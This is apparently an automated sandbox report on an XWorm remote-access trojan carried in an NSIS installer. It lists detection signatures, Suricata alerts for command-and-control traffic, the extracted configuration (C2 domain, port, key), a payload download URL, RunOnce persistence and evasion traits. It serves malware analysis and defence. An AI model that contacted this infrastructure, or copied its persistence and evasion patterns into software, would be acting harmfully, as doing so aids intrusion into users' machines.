Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
H33UCslPzv.exe

Overview

General Information

Sample name:H33UCslPzv.exe
renamed because original name is a hash value
Original sample name:462c6c970323f0e94eecb835032d8e993fca9ee0c6f944f656dfebde036479ed.exe
Analysis ID:1542720
MD5:9ecae0d26219ddb2355ad7b597887760
SHA1:3946b3ad9b7233bdda8053c2410d796bdc9fa21d
SHA256:462c6c970323f0e94eecb835032d8e993fca9ee0c6f944f656dfebde036479ed
Tags:CloudflareTunnelsRATexeuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • H33UCslPzv.exe (PID: 1528 cmdline: "C:\Users\user\Desktop\H33UCslPzv.exe" MD5: 9ECAE0D26219DDB2355AD7B597887760)
    • H33UCslPzv.exe (PID: 5968 cmdline: "C:\Users\user\Desktop\H33UCslPzv.exe" MD5: 9ECAE0D26219DDB2355AD7B597887760)
  • cleanup
{"C2 url": ["xwor3july.duckdns.org"], "Port": "9402", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    Process Memory Space: H33UCslPzv.exe PID: 5968JoeSecurity_XWormYara detected XWormJoe Security

      System Summary

      barindex
      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\H33UCslPzv.exe, ProcessId: 5968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Extra10
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\H33UCslPzv.exe, ProcessId: 5968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Extra10
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-26T08:45:04.331057+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.958367TCP
      2024-10-26T08:45:09.456365+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.958367TCP
      2024-10-26T08:45:23.795545+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.958367TCP
      2024-10-26T08:45:34.355458+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.958367TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-26T08:45:04.331057+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.958367TCP
      2024-10-26T08:45:34.355458+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.958367TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-26T08:45:09.209046+020028559241Malware Command and Control Activity Detected192.168.2.95836712.221.146.1389402TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: H33UCslPzv.exeAvira: detected
      Source: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pifAvira: detection malicious, Label: TR/AD.NsisInject.oovyn
      Source: 00000005.00000002.2750831860.0000000035981000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["xwor3july.duckdns.org"], "Port": "9402", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
      Source: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pifReversingLabs: Detection: 50%
      Source: H33UCslPzv.exeReversingLabs: Detection: 50%
      Source: H33UCslPzv.exeVirustotal: Detection: 63%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: H33UCslPzv.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.9:50132 version: TLS 1.2
      Source: H33UCslPzv.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_004062F0 FindFirstFileA,FindClose,0_2_004062F0
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004057B5
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_00402765 FindFirstFileA,5_2_00402765
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_004062F0 FindFirstFileA,FindClose,5_2_004062F0
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_004057B5 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004057B5

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 12.221.146.138:9402 -> 192.168.2.9:58367
      Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 12.221.146.138:9402 -> 192.168.2.9:58367
      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:58367 -> 12.221.146.138:9402
      Source: Malware configuration extractorURLs: xwor3july.duckdns.org
      Source: unknownDNS query: name: xwor3july.duckdns.org
      Source: global trafficTCP traffic: 192.168.2.9:58367 -> 12.221.146.138:9402
      Source: Joe Sandbox ViewIP Address: 12.221.146.138 12.221.146.138
      Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /LfGiMdRCMSvlQHkIpf170.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: apslline.comCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: apslline.com
      Source: global trafficDNS traffic detected: DNS query: xwor3july.duckdns.org
      Source: H33UCslPzv.exe, Thereagainst198.pif.5.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: H33UCslPzv.exe, Thereagainst198.pif.5.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/A/9
      Source: H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/F/&
      Source: H33UCslPzv.exe, 00000005.00000002.2726708619.0000000006FB0000.00000004.00001000.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/LfGiMdRCMSvlQHkIpf170.bin
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
      Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
      Source: unknownHTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.9:50132 version: TLS 1.2
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405252
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403248
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_00403289 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403289
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile created: C:\Windows\SysWOW64\traveskoen.iniJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_70021A980_2_70021A98
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_000DEB985_2_000DEB98
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_000D0E985_2_000D0E98
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_388579505_2_38857950
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_3885BF285_2_3885BF28
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_388522405_2_38852240
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_388515615_2_38851561
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_3885B6585_2_3885B658
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_388502B85_2_388502B8
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_388522305_2_38852230
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_3885B3105_2_3885B310
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: String function: 00402B2C appears 50 times
      Source: H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs H33UCslPzv.exe
      Source: H33UCslPzv.exe, 00000005.00000002.2751223108.0000000037CF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs H33UCslPzv.exe
      Source: H33UCslPzv.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@3/28@10/2
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403248
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_00403289 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403289
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_0040450D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040450D
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
      Source: C:\Users\user\Desktop\H33UCslPzv.exeMutant created: NULL
      Source: C:\Users\user\Desktop\H33UCslPzv.exeMutant created: \Sessions\1\BaseNamedObjects\JIs7HXfvmVwG8wtR
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile created: C:\Users\user\AppData\Local\Temp\nsr5955.tmpJump to behavior
      Source: H33UCslPzv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: H33UCslPzv.exeReversingLabs: Detection: 50%
      Source: H33UCslPzv.exeVirustotal: Detection: 63%
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile read: C:\Users\user\Desktop\H33UCslPzv.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\H33UCslPzv.exe "C:\Users\user\Desktop\H33UCslPzv.exe"
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess created: C:\Users\user\Desktop\H33UCslPzv.exe "C:\Users\user\Desktop\H33UCslPzv.exe"
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess created: C:\Users\user\Desktop\H33UCslPzv.exe "C:\Users\user\Desktop\H33UCslPzv.exe"Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: avicap32.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: msvfw32.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: H33UCslPzv.exeStatic file information: File size 3212629 > 1048576
      Source: H33UCslPzv.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_70021A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70021A98
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_70022F60 push eax; ret 0_2_70022F8E

      Persistence and Installation Behavior

      barindex
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile created: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pifJump to dropped file
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile created: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pifJump to dropped file
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile created: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\H33UCslPzv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Extra10Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Extra10Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Extra10Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Extra10Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
